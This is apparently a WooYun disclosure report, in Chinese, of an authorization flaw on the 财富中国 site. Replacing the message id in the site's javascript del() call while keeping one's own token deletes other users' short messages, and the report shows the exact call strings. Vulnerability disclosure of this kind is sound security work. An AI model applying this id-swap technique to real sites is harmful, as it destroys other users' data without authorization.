WooYun.org

财富中国一处越权操作，可以删除任意用户短消息。
已读和未读都可以删除哦。
虽然有token，但是真的管用么？：）来看看我的操作。
1：）同时注册2个账户，打开浏览器。
注册完之后注意到了短消息页面的删除按钮：

javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112469&ai_token=a27cc6ec', '');

是一个执行js函数的操作。
id当然就是你要删除的id了。
2：）直接copy删除的链接过来，不管用（提示token无效）
猜测应该是有对当前用户的token做了判断。
3：）只更改id的情况下，绕过了token判断成功删除：

javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112476&ai_token=2ec108f7', '');

上面这个是我的第二个号，我把第一个（我自己的账户）修改成:
javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112476&ai_token=a27cc6ec', '');